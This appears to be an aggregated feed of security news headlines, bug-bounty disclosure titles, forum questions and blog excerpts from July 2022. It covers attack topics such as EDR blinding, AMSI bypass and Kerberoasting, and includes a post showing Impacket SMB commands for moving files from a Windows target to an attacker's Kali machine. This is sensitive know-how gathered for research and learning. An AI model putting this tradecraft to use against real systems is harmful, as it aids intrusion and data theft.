    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1490311 - Bounty: $500

    Rods and Cones, and EDR "blindness"
    I ran across an interesting post recently regarding blinding EDR on Windows systems, which describes four general techniques for avoiding EDR monitoring. Looking at the techniques, I've seen several of these techniques in use on actual, real world incidents. For example, while I was with the Crowdstrike Overwatch team, we observed a threat actor reach out to determine systems with Falcon installed; of the fifteen systems queried, we knew from our records that only four were covered. We lost visibility because the threat actor moved to one of the other eleven systems. I've also seen threat actors "disappear from view" when they've used the Powershell console rather than cmd.exe, or when the threat actor has shell-based/RDP access to systems and uses a GUI-based tool. EDR telemetry includes …

    Inbound FW rules for “cybersecurity”?
    I am part of a team that’s standing up a lab network that resides on a corporate DMZ. The lab network will be isolated except for a handful of resources, all outbound. My lab has its own firewall because we want to lock it down. I told the network engineer I wanted all inbound ports blocked and he said he couldn’t do that. At first, he said it’s because of endpoint management software that the LAN users have. I pointed out that our network has a unique use case and was approved to not have endpoint management software loaded on any of the devices. Then he said that cybersecurity needs inbound ports to do their scans. This doesn’t make much sense to me so I pushed back and asked what ports exactly. He did not like that and just said “I’ve been doing this a long time”. Two questions: 1. Shouldn’t “all inbound ports blocked” be an optimal position from a security standpoint? 2. Are there any legitimate inbound ports that should be open for “cybersecurity”? Thanks for helping me learn! submitted by /u/pseudorandom_name [link] [comments]
    Question about Kerberoasting
    Hi, I created a simple lab with 1 VM as Domain Controller (Windows 2019) and a few users/computers. I ran setspn -T domain.local and I found several SPNs, but just one is in CN=Users, while the others are mostly in CN=Computers. If I understand correctly, such SPNs (computers, domain controller) aren't useful for Kerberoasting because they generally have very complex passwords, correct? I mean: Kerberoasting is meant to be a valid attack path only with SPNs configured on regular users? Thank you submitted by /u/g-simon [link] [comments]
    Since the connection ID (CID) isn't encrypted in QUIC packets and QUIC allows you to keep existing connections even if your IP changes because it verifies the CID, isn't it easy to spoof a user?
    For example when someone is on the same network as you. submitted by /u/esp32s2 [link] [comments]

    10 ways to approach a New Bounty target
    Poke around with the external surface and stuff like external search and parameters on the outside and not really dive into learning the… Continue reading on Medium »
    Publicly Accessible Android Crash Reports Containing Sensitive Information
    Hello Guys, Continue reading on Medium »
    HTTP Parameter Pollution - It’s Contaminated Again
    Summary : Continue reading on Medium »
    IW Weekly #11: Hacking Nginx, eJPT2.0, Free Hacking Resources, OWASP API, and more
    Hey 👋 Continue reading on InfoSec Write-ups »
    Sensitive Data Exposure: Inspect Element leads to injecting MongoDB Atlas via Realm
    Sensitive Data Exposure vulnerabilities can occur when a web application does not adequately protect sensitive information from being… Continue reading on Medium »
    Redeemer HackTheBox Challenge Walkthrough
    Redeemer by HackTheBox is indeed a very good challenge. So in this writeup/walkthrough we are going to see how we can pwn (hack) the… Continue reading on Medium »

    Fake Vulnerability, Risk Aversion and You
    Article URL: https://www.residentcontrarian.com/p/fake-vulnerability-risk-aversion Comments URL: https://news.ycombinator.com/item?id=32243828 Points: 2 # Comments: 0
    Log4j Zero-Day Vulnerability: Everything You Need to Know About the Apache Flaw
    Article URL: https://www.spiceworks.com/it-security/vulnerability-management/articles/log4j-apache-vulnerability-everything-you-need-to-know/ Comments URL: https://news.ycombinator.com/item?id=32235197 Points: 2 # Comments: 1

    Hunting For Mass Assignment Vulnerabilities Using GitHub CodeSearch and grep.app
    submitted by /u/l_tennant [link] [comments]
    Malicious IIS extensions quietly open persistent backdoors into servers
    submitted by /u/SCI_Rusher [link] [comments]
    Awesome Open-Source Adversary Simulation Tools
    submitted by /u/sciencestudent99 [link] [comments]
    CVE-2022-31813: Forwarding addresses is hard
    submitted by /u/0xdea [link] [comments]
    How to analyze Linux malware – A case study of Symbiote
    submitted by /u/CyberMasterV [link] [comments]
    Zyxel authentication bypass patch analysis (CVE-2022-0342)
    submitted by /u/0xdea [link] [comments]
    Bypass AMSI in local process hooking NtCreateSection
    submitted by /u/gid0rah [link] [comments]
    GitHub - InitRoot/wodat: Windows Oracle Database Attack Toolkit
    submitted by /u/InitRoot [link] [comments]
    US Government Review of the December 2021 Log4j Event
    submitted by /u/ScottContini [link] [comments]
    When Hypervisor Met Snapshot Fuzzing
    submitted by /u/Gallus [link] [comments]

    Magnet Axiom Android Mobile Evidence
    Hi, is there other software out there that can open/examine/export from the evidence files? Can Encase or Cellebrite PA accomplish this? submitted by /u/hw60068n [link] [comments]

    Race condition in faucet when using starport
    Cosmos disclosed a bug submitted by cyberboy: https://hackerone.com/reports/1438052 - Bounty: $5000

    Malicious IIS extensions quietly open persistent backdoors into servers
    submitted by /u/SCI_Rusher [link] [comments]

    War in Ukraine / July 25
    Day 153: A strong South or strong East — is Russia’s dilemma Continue reading on Medium »
    STRATDELA Special Issue #1: Dark Eagle
    In this first Special Issue of my STRATDELA newsletter (https://www.getrevue.co/profile/STRATDELA) Continue reading on Medium »
    OPINION: OSINT, Ethics and Social Media
    Apparently, the internet [the people operating consoles that feed information in the form of human interaction through fiber optic cable]… Continue reading on Medium »
    How to identify your Email Credential Leaked Information
    Continue reading on Medium »

    SecWiki News 2022-07-26 Review
    No news updated today. For more recent articles, visit SecWiki

    IW Weekly #11: Hacking Nginx, eJPT2.0, Free Hacking Resources, OWASP API, and more
    You MUST sanitize PHP mail() inputs — or else RCE!
    Mail Server Misconfiguration leads to sending a fax from anyone’s account on HelloFax (Dropbox BBP)…

    Attackers Move Quickly to Exploit High-Profile Zero Days: Insights From the 2022 Unit 42 Incident Response Report
    The Unit 42 Incident Response Report includes insights on which software vulnerabilities are commonly exploited for initial access and a description of how attacker behavior around zero-day vulnerabilities is shifting.

    FreeBuf Morning Report | Software problems lead to the dismissal of Volkswagen's CEO; new variant of a UEFI motherboard BIOS trojan discovered
    Venture investment across the cybersecurity sector fell to US$3.4 billion in the second quarter, down nearly 40% quarter on quarter.
    Threat trapping with open-source honeypots | FreeBuf in-house security community livestream recap
    On July 21, Jiang Peng (安平不太平), a security expert at an IoT company, was the speaker for the seventh internal livestream of the FreeBuf in-house security community, sharing threat trapping based on open-source honeypots.
    Cyber Powers series | How the United States became the hegemon of cyberspace
    Taken together, the many cyber attacks launched by the United States reveal the powerful cybersecurity capability behind them, which has step by step carried it to the throne of cyber hegemony.
    FileWave MDM vulnerabilities could allow threat actors to compromise thousands of enterprises
    Claroty researchers discovered two vulnerabilities in the FileWave MDM product.
    Hackers exploit a PrestaShop zero-day to compromise online stores
    The PrestaShop team issued an urgent warning last Friday that hackers are targeting websites built on the PrestaShop platform.
    Lockbit ransomware gang claims to have breached Italy's tax agency
    The Lockbit ransomware gang claims to have stolen 78 GB of files from Italy's tax agency.
    Source code of a Rust-based info-stealer released; experts warn it is already being used
    The malware's developer claims it was written in only 6 hours and is quite stealthy, with a VirusTotal detection rate of about 22%.
    [Hot Topic] 2022 attack-and-defense exercise intelligence tracking
    With the exercises under way, FreeBuf and the Vulbox (漏洞盒子) Intelligence Planet bring you fresh and timely intelligence.
    Shanghai launches a call for results for the 2022 Cybersecurity Industry Innovation Breakthrough Catalogue
    The Shanghai Municipal Commission of Economy and Informatization has organized the compilation of the "2022 Shanghai Cybersecurity Industry Innovation Breakthrough Catalogue".

    Introduction
    Hello guys, my name is Caleb Jephuneh and welcome to my blog Continue reading on Medium »
    Sensitive Data Exposure: Taking over every account, your account = my account.
    Sensitive Data Exposure vulnerabilities can occur when a web application does not adequately protect sensitive information from being… Continue reading on Medium »
    OPEN REDIRECT VULNERABILITIES: ESCALATING TO XSS
    This article was originally published at BePractical Continue reading on Medium »
    Mail Server Misconfiguration leads to sending a fax from anyone’s account on HelloFax (Dropbox BBP)…
    Hi Everyone!, Continue reading on InfoSec Write-ups »
    Mail Server Misconfiguration leads to sending a fax from anyone’s account on HelloFax (Dropbox BBP)…
    Hi Everyone!, Continue reading on Medium »
    DoS worth $650 ? Interesting right!
    Hey Guys, my name is Sagar Sajeev. This is my second writeup and I would like to share how I was rewarded with a bounty of $650 for a… Continue reading on Medium »
    How I Gained Access To A Finance Company’s Accounts (Session Hijacking)
    In a web application security test, I gained access to hundreds of accounts that have belonged to a finance company. The vulnerability… Continue reading on Medium »
    MSA Weekly 5 - “How to Get Sensitive Data Exposure on Web Application”
    OWASP category Continue reading on Medium »
    $1.333 For Account Takeover Via Reset Password
    Assalamualaikum, hello Bug Hunters! This time I found a very critical security hole in one application. Without further ado, straight… Continue reading on Medium »
    Open Redirect vulnerability in igp.com
    Hello everyone, I am Vignesh, a 20-year-old Security Researcher from TamilNadu, India. Continue reading on Medium »

    Automate google hacking database by python script.
    In this tutorial we have simple python script which will ask for url and use certain dork to search in google and finally show the result… Continue reading on Medium »
    The importance of educating Security Personnel and Intelligence Analysts about biases
    Bias is a topic that many industries like to avoid, and the security and intelligence industries are no exception. However, there is a… Continue reading on Medium »
    Social Media Investigations and Monitoring for Risk Mitigation Purposes
    The use of social media and the way it affects our lives and businesses have brought a new challenge to the security industry and the… Continue reading on Medium »
    War in Ukraine / July 22–24
    Day 152: The battle for Vuhlehirska Power Station Continue reading on Medium »
    Searching YouTube videos by coordinates
    Youtube needs no introduction — everybody knows what it is. But for us, OSINT enthusiasts, it is much more than just a video platform… Continue reading on Medium »
    OSINT ON SOCIAL MEDIA ACCOUNTS
    USING SHERLOCK TOOL TO CONDUCT OSINT Continue reading on Medium »

    Finding Flaws in FileWave MDM
    submitted by /u/derp6996 [link] [comments]
    CosmicStrand: the discovery of a sophisticated UEFI firmware rootkit
    submitted by /u/surrealisticpillow12 [link] [comments]
    Attack Chain Déjà-vu: The infection vector used by SVCReady, Gozi and IcedID
    submitted by /u/OwnPreparation3424 [link] [comments]
    Pulsar — an open-source runtime security framework powered by Rust & eBPF for IoT
    submitted by /u/JDBHub [link] [comments]
    PART 2: How I Met Your Beacon - Cobalt Strike
    submitted by /u/Gallus [link] [comments]
    Multiple vulnerabilities in Nuki smart locks
    submitted by /u/Gallus [link] [comments]
    Since Microsoft patched PPLDump's exploit I'm open sourcing RIPPL, a tool based off PPLDump which enabled more offensive capabilities against PPL processes like EDRs - @last0x00
    submitted by /u/last0x00 [link] [comments]

    Node.js - DLL Hijacking on Windows
    Internet Bug Bounty disclosed a bug submitted by yakirka: https://hackerone.com/reports/1636566 - Bounty: $3000

    Tales from the onsite
    This blog will contain all sorts of social engineering shenanigans, mainly from onsite assessments. Continue reading on Medium »
    How I chained multiple CVEs & other vulnerabilities during an RTO to pwn the company remotely
    The exploitation of Pulse VPN application to gain full control on the VPN server and pivot across the cloud infrastructure. Continue reading on Medium »
    Weaponizing DLL Hijacking with Custom Powershell C2
    Is DLL Hijacking dangerous? How can DLL Hijacked be used in real-life scenario? Hold me keyboard! Continue reading on Medium »

    Docker: Creating a Pivoting Lab and Exploiting it
    https://medium.com/p/a66646dc2cf3 submitted by /u/Protection-Mobile [link] [comments]
    Pivoting with Socks and Proxychains
    submitted by /u/Clement_Tino [link] [comments]
    PART 2: How I Met Your Beacon - Cobalt Strike - @MDSecLabs
    submitted by /u/dmchell [link] [comments]

    SecWiki News 2022-07-25 Review
    PDGraph: a large-scale empirical study of insecure project dependencies by ourren; NeuVector: feature-rich and powerful open-source container security software by ourren; A survey of just-in-time defect prediction tools by ourren; Buffer overflow vulnerabilities: the C gets function by SecIN community; SecWiki Weekly (Issue 438) by ourren; For more recent articles, visit SecWiki

    IAM-Deescalate: An Open Source Tool to Help Users Reduce the Risk of Privilege Escalation
    We developed an open source tool, IAM-Deescalate, to help mitigate the privilege escalation risks of overly permissive identities in AWS.

    Imaging the impossible? A Samsung Galaxy Book Go
    Hi all! I have a Samsung Galaxy Book Go (np340xla) that so far feels impossible to image and I was wondering if anyone had any suggestions. This is what I have tried so far: Remove the disk: can't, it's soldered on. Boot from Paladin/Kali/Ubuntu/Mint: USB won't appear as an option. Secure Boot is already disabled (was never enabled). BIOS is the most minimal BIOS I have ever seen. UEFI option from BIOS? Non-existent. Can't boot from anything other than the Windows Boot Manager or an option called "USB: hard disk" (it goes back to the disk). I have used USB-C, USB-3, USB-2, a powered USB hub. I have tried the Linux distros in both UEFI and I can reach the "recovery" option from Windows, but that won't get me anywhere other than deleting the disk. Any other ideas? At this point, I will accept ANYTHING as long as I can image this laptop. Just in case it is asked: I don't have the PIN (: submitted by /u/agente_99 [link] [comments]
    Best site for memory forensic test
    Hi. There are plenty of sites that test you in network forensics, providing you with a pcap file to analyze and asking you questions to answer. Are there any sites like that for memory forensics that you like? submitted by /u/antmar9041 [link] [comments]

    FreeBuf Morning Report | The digital yuan can meet individuals' anonymous payment needs; Google fires the engineer who said its chatbot is sentient
    The engineer insisted that Google's LaMDA chatbot is sentient; Google fired him for violating the "employment and data security policies" that protect its trade secrets.
    IDC network threat detection and response market report: Tophant (斗象科技) leads in growth
    Tophant was included in the IDC report, with its PRS-NTA product showing eye-catching market growth.
    QBot infects devices via DLL side-loading
    A DLL side-loading flaw in Windows 7 has recently been exploited by the QBot malware.
    Amadey makes a comeback, distributed by the SmokeLoader malware
    A new version of the Amadey Bot malware, using software-crack and keygen sites as bait, is being distributed through the SmokeLoader malware.
    Hacker selling data on 5.4 million Twitter accounts for US$30,000
    The hacker says the data covers account information for some well-known people, companies and institutions, and random ordinary users.
    Digital security giant Entrust hit by a ransomware attack
    Digital security giant Entrust has admitted that it suffered a cyberattack in which the attackers breached its internal network and stole a certain amount of data.

    This is why you should ALWAYS check for Race Conditions (even in JavaScript)

    Differentiate three types of eBPF redirections (2022)
    TL;DR: There are three types of eBPF redirection fashions in the Linux kernel that often confuse developers: bpf_redirect_peer(), bpf_redirect_neighbor() and bpf_redirect(). This post helps to clarify them by digging into the code in historical order, and also discusses usages and related problems in the real world. Contents: TL;DR; 1 The foundation: bpf_redirect(), 2015; 1.1 The documentation (Description; Comparison with bpf_clone_redirect()); 1.2 Kernel implementations/changes (1. Add TC action type TC_ACT_REDIRECT; 2. Add new BPF helper & syscall; 3. Process redirect logic in TC BPF); 1.3 Call stack; 2 Egress optimization: bpf_redirect_neighbor(), 2020; 2.1 Comparison with bpf_redirect(); 2.2 Kernel implementations/changes (1. Modify skb_do_redirect(), prefer the new one whenever available; 2.…

    TryHackMe — NahamStore Part 1 | XSS (Tasks 3&4) —  (Medium)
    Hello again and welcome to another one of my CTF write-up attempts. Since I have recently been trying to step up my web app pentesting… Continue reading on Medium »

    Analyzing raw image
    This may seem like a stupid question but I've been trying to figure this out all day and I haven't had a clue. I'm using PowerShell to open Volatility and I want to analyze a raw image I have saved in my Downloads folder on my Windows computer. How can I tell Volatility via PowerShell to open that image? submitted by /u/1rangusN1dangus [link] [comments]

    ProtectMyTooling – Don’t detect tools, detect techniques – mgeeky's lair
    submitted by /u/dmchell [link] [comments]

    3 things to do if you want to be a penetration tester
    Now that I would consider myself to no longer be a beginner penetration tester, I feel like it is a great time to reflect on my personal… Continue reading on Medium »
    Start hacking career part 4 | create a custom word list for your target …
    is a pain; follow these steps to create a custom word list for your target. If you are new to bug bounty and you want to learn from scratch… Continue reading on Medium »
    ONERARE TESTNET QUICK GUIDE 70,000 $ORARE AS REWARD
    OneRare is creating the world’s first Foodverse for the Global Food Industry. Our first launch is the Gaming Zone, celebrating Dishes from… Continue reading on Medium »
    Privilege Escalation
    Assalam O Alaikum. Alhamdullillah! Continue reading on Medium »
    Red vs Blue Team Project
    Assessment, Analysis, and Hardening of a vulnerable system. This report includes a Red Team Security Assessment, a Blue Team Log Analysis… Continue reading on Medium »
    A Developer’s Nightmare: Story of a simple IDOR and some poor fixes worth $1125
    Hello Everyone, I hope you all are doing good. This is my second blog and in this will be covering a finding of a Simple IDOR followed by… Continue reading on Medium »
    MSA Weekly 5 — “How to Get Sensitive Data Exposure on Web Application”
    In the world of pentesting there is a standard used as a reference or security standard that readers may already know about… Continue reading on Medium »
    Why Did I Fail At Bug Bounties?
    Hello folks, Continue reading on Medium »
    Host Header injection to redirect in live website
    Hi this is my fifth blog and if you want to read my first blog(about xss bug) then click on this link: My First Bug Bounty. Continue reading on Medium »
    The 6 UGLY TRUTHS about Security Certifications
    Here we are again, with yet another (possibly) controversial topic. This time it is about security certifications. Regardless of whether you are in… Continue reading on Medium »

    CVE-2022-27781: CERTINFO never-ending busy-loop
    Internet Bug Bounty disclosed a bug submitted by sybr: https://hackerone.com/reports/1606039 - Bounty: $480

    MFA validity through multiple IP addresses
    Hello, I got an alert saying that an O365 OWA account was being logged in from multiple IP addresses. On checking, I found that while the user was in India and had MFA enabled, the logins were happening through over 100 separate IP addresses in Nigeria. The user may have used Microsoft Authenticator to accidentally click yes to one of the logins. How do these attackers manage to keep sessions alive over multiple computers and over the period of a week? Is there a change that needs to be made in the O365 admin console to protect against this? Say ask for the password every 12 hours and the same for MFA. I am checking the audit logs and clearly the attacker read some of the users emails, but no harm that we can find yet. submitted by /u/indianadmin [link] [comments]
    Does anyone have any extra SANS practice tests available?
    Does anyone have any extra SANS practice tests (SANS 522) available? submitted by /u/herbertisthefuture [link] [comments]
  • Open

    Assets for geocities.restorativland.org (mostly screenshots)
    submitted by /u/ilikemacsalot [link] [comments]
    'alternative living' stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Fractals
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Movies but what language are they?
    http://www.konectar1.com/yesi/ http://www.netfrg.com/mov/ submitted by /u/RainyAbrar [link] [comments]
    Movies
    Not sure about speed. Didn't go through it all, hence marking NSFW. http://jotokusi.com/ftp/ Not sure if already posted "site:reddit.com/r/opendirectories http://jotokusi.com/ftp/" -- turned up no result to me. submitted by /u/RainyAbrar [link] [comments]
  • Open

    The End of PPLdump
    submitted by /u/0xdea [link] [comments]
    Investigating a Hacked WordPress site on Linode. Step by step.
    submitted by /u/nykzhang [link] [comments]
  • Open

    SecWiki News 2022-07-24 Review
    No news updated today. For more of the latest articles, visit SecWiki
  • Open

    History Repeats Itself
    It's said that those who do not study history are doomed to repeat it. I'd suggest that the adage should be extended to, "those who do not study history and learn from her lessons are doomed to repeat it." My engagement with technology began at an early age; in the early '80s, I was programming BASIC on a very early IBM-based PC, the Timex-Sinclair 1000, and Mac IIe. By the mid-'80s, I'd programmed in BASIC and Pascal on the TRS-80. However, it wasn't until I completed my initial military training in 1990 that I began providing technology as a service to others; I was a Communications Officer in the Marine Corps, providing trained technical Marines, servicing technical assets, in support of others. I had been taught about the technology...radios, phones, switchboards, etc...and troublesho…
  • Open

    How to Become an OSINT Master: Tips, Tricks, and Tools — Part 2
    Hey Folks! I hope you liked part 1 of my OSINT series. In this blog, we will discuss some excellent and professional techniques of… Continue reading on Medium »
    SPY NEWS: 2022 — Week 29
    Summary of the espionage-related news stories for the Week 29 (July 17–23) of 2022. Continue reading on Medium »
  • Open

    Red vs Blue Team Project
    Assessment, Analysis, and Hardening of a vulnerable system. This report includes a Red Team Security Assessment, a Blue Team Log Analysis… Continue reading on Medium »
  • Open

    Who touched my DevOps: mapping DevOps risk
    The DevOps market exceeded US$7 billion in 2021 and is expected to grow at a compound annual growth rate of over 20% between 2022 and 2028.
    Attackers are promoting a new version of the Redeemer ransomware on hacker forums
    Threat actors are promoting a new version of the Redeemer ransomware builder on hacker forums.
  • Open

    Pivoting Techniques with THM Wreath
    No content preview

  • Open

    Coursera Specializations - Are they worth it in Forensics/Cyber Incident Response?
    Hey all - general research. Are certifications/specializations from Coursera (with capstone projects or practicals) worth it? I am currently studying for CompTIA Sec+ (10+ years' experience working in IT/incident response) and working in an analyst role with security IT work incorporated. I'd like to get additional experience, particularly in Computer/Digital Forensics, and upskill in my Cyber Response practices. I wanted to specialize in a niche, as a supplement to CompTIA Sec+ studies.
    - How are the following courses; would this be worth it (via the company InfoSec)?
      Cyber Incident Response Specialization
      Computer Forensics Specialization
    - Are there any solid books I could purchase that cover concepts for Computer/Digital Forensics and Cyber Incident Response? For example, I was checking out this book as a starting point: Digital Forensics and Incident Response
    Thank you for any advice in advance. submitted by /u/sora1493 [link] [comments]
    Remote work question
    Hi, I'm currently looking at getting into this field, and I wanted to ask: what are the chances of me, a European, getting a fully remote IR job in the U.S.? Will employers greatly prefer a candidate based in the U.S. even if the job can be done fully remote? As a foreigner I don't qualify for a security clearance; would this be a big barrier to getting a job? Thank you in advance. submitted by /u/Frederic_-104 [link] [comments]
    Extracting all images and videos from Autopsy using python
    Hi, I have a quick question concerning writing something in Python to extract all images and videos from Autopsy. I am halfway through the code to filter files into the newly created folders depending on the file extensions, but currently this only picks up files from a folder, not directly from Autopsy. Is it even possible to link it? And two, if it is possible, how would I go about linking it? If you need any more information please ask. I am only building this as the last three projects I've worked on have all been over 80,000 files, and it is easier to filter out the useless files when they have been assigned to a folder. Thanks submitted by /u/sudo_oth [link] [comments]
  • Open

    Help understanding computer vulnerability to malware and hacks
    OS: Windows 11. Hi all, I am a bit of a hypochondriac, but with viruses etc., always thinking I'm going to get hacked or I already am and someone has control over my PC. So I want to ask the following: Are drive-by downloads, i.e. unintended dangerous file downloads when I visit a dodgy website and popups come up and tabs open and/or close, possible on Google Chrome? If so, how can I find out if my computer is infested? Is it possible for a virus or malicious files or software to attach itself to personal files on my PC, or can I safely move my personal files to an external drive and format my PC? Does a Windows full scan detect the above mentioned? Thanks a lot for any help! submitted by /u/lassolass [link] [comments]
    How can a hacker get into your pics and then use them to blackmail you?
    I know someone who was blackmailed with some di*k pics, and wonder how to avoid this kind of situation. submitted by /u/MoteCnHuesillo [link] [comments]
    Trying to help a friend who has a Deadbolt issue. No idea what I'm doing!
    So a friend of mine has their own business and they tried to attach a picture to an email and they noticed that rather than .jpeg, it read .deadbolt (I think). I've looked it up and it just says to update the firmware but they will still need to pay the ransom to get any encrypted files back. I just wondered if anyone knows anything about this and if they can tell me if what I've read is right or if anyone has any further ideas or suggestions? submitted by /u/Silver020 [link] [comments]
  • Open

    Twitter Vulnerability Exposes Data from 5.4M Accounts
    Article URL: https://restoreprivacy.com/twitter-vulnerability-exposes-5-million-accounts/ Comments URL: https://news.ycombinator.com/item?id=32208204 Points: 1 # Comments: 0
    Verified Twitter Vulnerability Exposes Data from 5.4M Accounts
    Article URL: https://restoreprivacy.com/twitter-vulnerability-exposes-5-million-accounts/ Comments URL: https://news.ycombinator.com/item?id=32201333 Points: 4 # Comments: 0
  • Open

    Transferring files from windows to kali using Impacket smbserver.py doesn't work?
    Transferring files from Kali to Windows is easy with something like python http.server. What about transferring files from Windows to Kali? I found a very useful blog post here and attempted to do a similar thing with Impacket smbserver.py: https://blog.ropnop.com/transferring-files-from-kali-to-windows/#smb

    Setup
    Kali: 172.16.1.10
    Windows: 172.16.1.50

    Run smbserver on Kali with Impacket smbserver.py:

    └─$ /usr/share/doc/python3-impacket/examples/smbserver.py share /tmp
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
    [*] Config file parsed

    However, whenever I try on Windows, I'm getting "System error 53 has occurred, The network path was not found" as follows:

    C:\>net view \\172.16.1.10\
    System error 53 has occurred.
    The network path was not found.

    Here is the message on Impacket smbserver.py:

    [*] Incoming connection (172.16.1.50,56201)
    [*] Closing down connection (172.16.1.50,56201)
    [*] Remaining connections []

    Then, I tried again with \share, but I'm still getting the same error:

    C:\>net view \\172.16.1.10\share
    System error 53 has occurred.
    The network path was not found.

    What's wrong and what should I do to make this right? submitted by /u/w0lfcat [link] [comments]
  • Open

    GUIDE: Debunking disinformation about tanks forming a bank barricade in China.
    Open source investigation often can be used as a weapon to fight disinformation that is spread on social-media. One of them that stood out… Continue reading on Medium »
    TryHackMe | Sakura Room
    TryHackMe’s Sakura Room. From finding an image left by an attacker to finding their town. Continue reading on Medium »
  • Open

    SecWiki News 2022-07-23 Review
    No news updated today. For more of the latest articles, visit SecWiki
  • Open

    Bug Bounty: Hunting Open Redirect Vulnerabilities For $$$
    This article was originally published at BePractical Continue reading on Medium »
    Un3xpected DoS Attack on Profile Pictur3
    Hey Everyone, Hope y’all doing gr3at and aw3some! Continue reading on InfoSec Write-ups »
    My Bug Bounty Resources
    Hello Amazing People, Continue reading on System Weakness »
    $$$ bounty in less 3 minutes from a google dork
    ~ Hi Bug Bounty Hunters & CyberSecurity folks!!! It's been a long time since I dropped a bug bounty writeup. Continue reading on Medium »
    CyberTalents BootCamp 2022 #fisher
    ~ Steiner254 says … Congratulations!!! For making it to CyberTalents BootCamp 2022. Good Luck in your journey :) Continue reading on Medium »
    YACHTINGVERSE STAKING TESTNET CAMPAIGN (QUICK GUIDE)
    YachtingVerse is an open-world, marine-themed, massively multi-user platform built on the BNB Beacon Chain. This platform will bring together… Continue reading on Medium »
    SecStory: How I Found Multiple P1 Vulnerabilities without Recon
    Hi folks. Nowadays there are so many bug hunting stories out there on the internet, but I named this one my “SecStory”; it stands for… Continue reading on Medium »
    Meow Starting Point HackTheBox Walkthrough
    Meow is a very good challenge by HackTheBox for starting to practice hacking skills. So without any delay, let's get into it. Continue reading on Medium »
  • Open

    Un3xpected DoS Attack on Profile Pictur3
    No content preview
    I mean, IDOR is NOT only about others ID
    No content preview
    How to NOT keep your Active Directory safe.
    No content preview
    This one trick will exploit URL parsers to perform SSRF
    No content preview
    This is why you should NEVER use the eval() function — RCE!
    No content preview
    Be Careful of User Input. You will get hacked.
    No content preview
    Beware of Ghosts!! — when CVE-2018–16509 leads to Remote Code Execution.
    No content preview
  • Open

    Turning Open Reporting Into Detections
    I saw this tweet from Ankit recently, and as soon as I read through it, I thought I was watching "The Matrix" again. Instead of seeing the "blonde, brunette, redhead" that Cypher saw, I was seeing actionable detection opportunities and pivot points. How you choose to use them...detections in EDR telemetry or from a SIEM, threat hunts, or specifically flagging/alerting on entries in DFIR parsing...is up to you, but there are some interesting...and again, actionable...opportunities, nonetheless. From the tweet itself... %Draft% is environment variable leading to PowerShell Environment variables are good...because someone has to set that variable using...wait for it...w  a  i  t   f  o  r    i  t...the 'set' command. This means that if the variable is set via the command line, the process …
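    An added example (not the blog's own code) of turning the observation above into a check: a `set NAME=VALUE` on a cmd.exe command line is suspicious when the value names a script interpreter, when the same command line expands `%NAME%` right after setting it, or when a child of that shell is an interpreter. The process events below are constructed, the variable name Draft is taken from the tweet quoted in the post, and the (time, pid, ppid, image, cmdline) shape is an assumption to map onto Sysmon event 1 or your EDR's process-creation fields.

```python
"""Turn 'environment variable set from the command line, later consumed by
PowerShell' into a check over process-creation events.  Added example, not
the blog's code; the events are constructed and the event shape is an
assumption."""
import re
from typing import NamedTuple


class ProcEvent(NamedTuple):
    time: str
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample: one cmd.exe stages a PowerShell command line in the
# variable Draft and expands it; another cmd.exe sets PATH for a build, which
# must not be flagged.
SAMPLE_EVENTS = [
    ProcEvent("10:00:01", 100, 10, "explorer.exe", "explorer.exe"),
    ProcEvent("10:00:05", 200, 100, "cmd.exe",
              'cmd.exe /c set Draft=powershell.exe -nop -w hidden -f %TEMP%\\u.ps1 && call %Draft%'),
    ProcEvent("10:00:06", 210, 200, "powershell.exe",
              "powershell.exe -nop -w hidden -f C:\\Users\\u\\AppData\\Local\\Temp\\u.ps1"),
    ProcEvent("10:05:00", 300, 100, "cmd.exe",
              'cmd.exe /c set PATH=C:\\tools;%PATH% && build.bat'),
]

# `set NAME=VALUE`; the value runs up to the next & or quote.
SET_RE = re.compile(r'\bset\s+"?([A-Za-z_][A-Za-z0-9_]*)=([^&"]*)', re.IGNORECASE)
INTERPRETERS = re.compile(
    r'\b(powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32|certutil)\b',
    re.IGNORECASE)


def find_env_var_staging(events):
    """Return one finding per `set NAME=VALUE` that looks like staging: the
    value names a script interpreter, the same command line expands %NAME%
    after setting it, or a child process of that shell is an interpreter."""
    findings = []
    for ev in events:
        for m in SET_RE.finditer(ev.cmdline):
            name, value = m.group(1), m.group(2)
            reasons = []
            if INTERPRETERS.search(value):
                reasons.append("interpreter-in-value")
            rest = ev.cmdline[m.end():]
            if re.search(r"%" + re.escape(name) + r"%", rest, re.IGNORECASE):
                reasons.append("expanded-in-same-commandline")
            if any(c.ppid == ev.pid and INTERPRETERS.search(c.image) for c in events):
                reasons.append("interpreter-child")
            if reasons:
                findings.append({"time": ev.time, "pid": ev.pid, "var": name,
                                 "value": value.strip(), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_env_var_staging(SAMPLE_EVENTS):
        print(f"{f['time']} pid={f['pid']} set {f['var']}={f['value']!r}: "
              f"{', '.join(f['reasons'])}")
```

The PATH line is the false-positive guard: `set` is used legitimately all day by build scripts, so the check is on what is set and how it is consumed, not on the `set` command alone.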
  • Open

    [doc.rt.informaticacloud.com] Reflected XSS via Stack Trace
    Informatica disclosed a bug submitted by bigbear_: https://hackerone.com/reports/232320
    [doc.rt.informaticacloud.com] Arbitrary File Reading via Double URL Encode
    Informatica disclosed a bug submitted by bigbear_: https://hackerone.com/reports/232371
    reflected XSS on panther.com
    Panther Labs disclosed a bug submitted by ibrahimatix0x01: https://hackerone.com/reports/1601140 - Bounty: $250
    Rack CVE-2022-30122: Denial of Service Vulnerability in Rack Multipart Parsing
    Internet Bug Bounty disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1627159 - Bounty: $2400
  • Open

    Careers in Cyber Security
    Careers in Cyber Security Continue reading on Bilişim Hareketi »
  • Open

    Jonathan's fun stuff
    http://users.ninja.org.uk/~jonathan/funstuff/ submitted by /u/RainyAbrar [link] [comments]

  • Open

    IDOR in report download functionality on ads.tiktok.com
    TikTok disclosed a bug submitted by f_m: https://hackerone.com/reports/1559739 - Bounty: $500
    CVE-2022-32214 - HTTP Request Smuggling Due To Improper Delimiting of Header Fields
    Internet Bug Bounty disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1630669 - Bounty: $1800
    CVE-2022-32213 - HTTP Request Smuggling Due to Flawed Parsing of Transfer-Encoding
